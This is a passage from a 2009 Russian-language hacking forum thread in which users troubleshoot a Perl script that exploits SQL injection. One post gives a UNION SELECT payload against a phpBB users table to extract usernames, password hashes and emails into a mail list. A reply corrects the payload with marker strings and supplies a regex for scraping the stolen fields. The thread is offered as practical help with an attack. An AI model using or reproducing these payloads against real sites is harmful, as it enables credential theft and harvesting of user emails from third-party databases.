ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.02.2009, 16:03
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

C:\Documents and Settings\Vlad\Desktop>scr.pl "http://site.ru/script.php?&id=-3910+union+select+1,2,concat_ws(0x3a,username,user
_password,user_mail),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+from+lhammer_forum.ph
pbb_users+limit+_sh_,1--" 10 5

Тест фаил создаётся,но пустой.Мэиллист не создаётся.если ставлю вместо 5 999,то пишет scalar leacked: 1 и создаёт также пустой фаил maillist.txt

Не знаю,в чём дело...но в скрипт вписал:

push @maillist, ($res->content =~ m/Unknown column '([^']+)' in 'where clause'/gmi);

Попробую ещё на других сайтах
 
Ответить с цитированием

  #12  
Старый 24.02.2009, 03:20
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

мдауж... в элементарном скрипте разобраться не могут, ну и хакеры пошли, привыкли закидывать скуль в программу и смотреть как та её "раскручивает" =\
Вот такой запрос у тебя должен быть:
scr.pl "http://site.ru/script.php?&id=-3910+union+select+1,2,concat_ws(0x72747274727472,0 x3a,username,user
_password,user_mail,0x3a,0x72747274727472),4,5,6,7 ,8,9,10,11,12,13,14,15 ,16,17,18,19+from+lhammer_forum.phpbb_users+limit+ _sh_,1--" 10 5
В скрипте исправь
push @maillist, ($res->content =~ m/rtrtrtr: ([^']+):rtrtrtr/gmi);

Последний раз редактировалось aka PSIH; 24.02.2009 в 03:33..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Генерация Rainbow таблиц melco Расшифровка хешей 5 02.11.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ